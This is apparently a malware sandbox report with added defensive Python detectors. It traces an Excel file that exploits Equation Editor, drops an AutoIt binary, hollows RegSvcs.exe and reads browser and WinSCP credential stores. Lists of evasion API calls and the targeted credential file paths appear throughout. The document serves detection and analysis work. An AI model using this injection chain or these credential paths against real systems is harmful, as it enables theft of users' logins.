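    image: str          # full path of the new process
    command_line: str   # command line it was started with
    parent_image: str   # full path of the creating process ("" if unknown)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _in_user_dir(path: str) -> bool:
    p = path.lower()
    return any(frag in p for frag in USER_WRITABLE)


def cmdline_exe(command_line: str) -> str:
    """Basename of the executable named by a command line (quoted or bare)."""
    cmd = command_line.strip()
    if not cmd:
        return ""
    if cmd[0] == '"':
        end = cmd.find('"', 1)
        token = cmd[1:end] if end > 0 else cmd[1:]
    else:
        token = cmd.split(None, 1)[0]
    return _base(token)


def detect(ev: ProcEvent) -> list:
    """Names of the rules that fire for one process-creation event."""
    hits = []
    img, parent = _base(ev.image), _base(ev.parent_image)
    if parent == EQUATION_EDITOR:
        # Equation Editor has no legitimate reason to create processes; a child
        # here is the CVE-2017-11882 / CVE-2018-0802 exploitation pattern.
        hits.append("equation_editor_child_process")
    if parent in OFFICE_PARENTS and _in_user_dir(ev.image):
        hits.append("office_spawns_binary_in_user_dir")
    cmd_exe = cmdline_exe(ev.command_line)
    if cmd_exe and cmd_exe != img:
        # Image on disk differs from the executable named on the command line:
        # RegSvcs.exe running as "CKK.exe" is the RunPE / hollowing tell.
        hits.append("image_commandline_mismatch")
    if img in DOTNET_HOSTS and _in_user_dir(ev.parent_image):
        hits.append("dotnet_host_spawned_from_user_dir")
    return hits


def triage(events) -> dict:
    """Map each event's image basename to the rules it triggered."""
    return {_base(ev.image): detect(ev) for ev in events}


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
CKK = r"C:\Users\user\AppData\Roaming\CKK.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# Constructed from the report's process tree; Excel's own parent is not listed there.
EVENTS = [
    ProcEvent(EXCEL, f'"{EXCEL}" /automation -Embedding', ""),
    ProcEvent(EQNEDT, f'"{EQNEDT}" -Embedding', EXCEL),
    ProcEvent(CKK, f'"{CKK}"', EQNEDT),
    ProcEvent(REGSVCS, f'"{CKK}"', CKK),
]

if __name__ == "__main__":
    for name, rules in triage(EVENTS).items():
        print(f"{name:14s} {rules or '-'}")
```

The image/command-line mismatch rule is the one to keep from this: the parent-child rules named in the report are tied to this particular chain, but a legitimately launched RegSvcs.exe is never given another binary's path as its command line, so that check still fires if CKK.exe is renamed or a different Office parent is used.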
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: credssp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\CKK.exe | Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\CKK.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\CKK.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\CKK.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\CKK.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\CKK.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\CKK.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\CKK.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\CKK.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\CKK.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: PO 2_5_24.xlam.xlsx | Initial sample: OLE zip file path = xl/media/image1.jpg
Source: PO 2_5_24.xlam.xlsx | Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: _.pdb | source: RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: CKK.exe, 00000003.00000003.446352254.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, CKK.exe, 00000003.00000003.446225699.0000000002D70000.00000004.00001000.00020000.00000000.sdmp
Source: PO 2_5_24.xlam.xlsx | Initial sample: OLE indicators vbamacros = False
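The "Initial sample" lines describe the container rather than the payload: the OLE stream indicators are all false because the file is a zip-based OOXML package, not an OLE2 compound file; sheet1.xml matched a LegacyDrawing rule; the package carries xl/media/image1.jpg and xl/calcChain.xml; and there is no VBA project. The Python below is an added example, not Joe Sandbox code, that reproduces this static triage over a constructed workbook. The sheet XML, the Equation.3 OLE object and the xl/embeddings part in it are made up for the demonstration and are not taken from the real sample; the report itself only shows that EQNEDT32.EXE was activated, not which part triggered it.

```python
"""Static triage of an Office file's container, mirroring the indicators this
report lists (OLE stream indicators, legacyDrawing in sheet1.xml, xl/media and
xl/calcChain.xml parts, vbamacros). Added example, not Joe Sandbox code; the
workbook built below is constructed, not the real sample."""
import io
import re
import zipfile

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 compound file (legacy .xls/.doc)
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML package (.xlsx/.xlam/.docx)
SHEET_RE = re.compile(r"xl/worksheets/sheet\d+\.xml$")
PROGID_RE = re.compile(r'<oleObject\b[^>]*\bprogId="([^"]+)"')


def container_type(data: bytes) -> str:
    """OLE2 and OOXML are told apart by magic bytes; 'OLE stream indicators:
    all false' in the report is what an OLE-stream scan yields for a zip."""
    if data.startswith(CFB_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    return "unknown"


def ooxml_indicators(data: bytes) -> dict:
    """Walk the zip parts and collect document-level indicators."""
    ind = {
        "container": container_type(data),
        "parts": [],
        "legacy_drawing": False,  # <legacyDrawing> in a sheet (VML anchor used by AutoLoad OLE objects)
        "ole_parts": [],          # xl/embeddings/* payloads
        "ole_progids": [],        # OLE server each object activates
        "vba_project": False,
        "calc_chain": False,
        "media": [],
    }
    if ind["container"] != "ooxml":
        return ind
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        ind["parts"] = names
        ind["vba_project"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        ind["calc_chain"] = "xl/calcChain.xml" in names
        ind["media"] = [n for n in names if n.startswith("xl/media/")]
        ind["ole_parts"] = [n for n in names if n.startswith("xl/embeddings/")]
        for n in names:
            if SHEET_RE.match(n):
                xml = zf.read(n).decode("utf-8", "replace")
                if "<legacyDrawing" in xml:
                    ind["legacy_drawing"] = True
                ind["ole_progids"] += PROGID_RE.findall(xml)
    return ind


def verdict(ind: dict) -> list:
    """Reasons to treat the file as suspicious, in a fixed order."""
    reasons = []
    if ind["vba_project"]:
        reasons.append("vba_project_present")
    if ind["legacy_drawing"] and (ind["ole_parts"] or ind["ole_progids"]):
        reasons.append("legacy_drawing_with_ole_object")
    if any(p.lower().startswith("equation") for p in ind["ole_progids"]):
        # Equation.3 objects are served by EQNEDT32.EXE, the process this report
        # shows dropping and starting CKK.exe (CVE-2017-11882 / CVE-2018-0802).
        reasons.append("equation_editor_ole_object")
    return reasons


# Constructed worksheet part: a legacyDrawing anchor plus an Equation.3 OLE object.
SHEET1_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
    'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
    "<sheetData/>"
    '<legacyDrawing r:id="rId1"/>'
    '<oleObjects><oleObject progId="Equation.3" shapeId="1025" r:id="rId2"/></oleObjects>'
    "</worksheet>"
)


def build_sample() -> bytes:
    """Minimal constructed OOXML package carrying the parts the report names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", SHEET1_XML)
        zf.writestr("xl/calcChain.xml", "<calcChain/>")
        zf.writestr("xl/media/image1.jpg", b"\xff\xd8\xff\xe0constructed-jpeg-stub")
        zf.writestr("xl/embeddings/oleObject1.bin", CFB_MAGIC + b"\x00" * 24)
    return buf.getvalue()


if __name__ == "__main__":
    ind = ooxml_indicators(build_sample())
    print(ind["container"], ind["legacy_drawing"], ind["ole_progids"], verdict(ind))
```

Run against a real file, read it as bytes and pass it to ooxml_indicators; the double extension in the sample name (.xlam.xlsx) is irrelevant to this check because the container type is taken from the magic bytes, not the name.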

                  Data Obfuscation

                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00E442DE
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E60A76 push ecx; ret 3_2_00E60A89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C40C push cs; iretd 4_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00423149 push eax; ret 4_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C50E push cs; iretd 4_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004231C8 push eax; ret 4_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E21D push ecx; ret 4_2_0040E230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C6BE push ebx; ret 4_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00273725 push ss; ret 4_2_00273729
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00274316 pushfd ; iretd 4_2_00274319
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L9ASkpV85GROR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L9ASkpV85GROR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L9ASkpV85GROR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L9ASkpV85GROR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'L9ASkpV85GROR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\CKK.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E5F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00E5F98E
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00ED1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_00ED1C41
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03590242 rdtsc
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                  Source: C:\Users\user\AppData\Roaming\CKK.exe API coverage: 4.5 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2008 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E7C2A2 FindFirstFileExW
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EB68EE FindFirstFileW,FindClose
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EB5C97 FindFirstFileW,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-7738
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-6739
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node graph_2-6786
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EBEAA2 BlockInput
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035905E4 mov edx, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E64CE8 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_001134D0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00113530 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00111ED0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EA0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E609D5 SetUnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E6083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E60C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004123F1 SetUnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Roaming\CKK.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EA1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E82BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EAB226 SendInput,keybd_event
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EC22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\CKK.exe"
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00EA1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                  Source: CKK.exe, 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp, CKK.exe.2.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: CKK.exe Binary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E60698 cpuid
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoA 4_2_00417A20
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E7333F GetSystemTimeAsFileTime
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E9D27A GetUserNameW
                  Source: C:\Users\user\AppData\Roaming\CKK.exe Code function: 3_2_00E7B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match, File source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 1128, type: MEMORYSTR
                  Source: Yara match, File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 3.2.CKK.exe.140000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
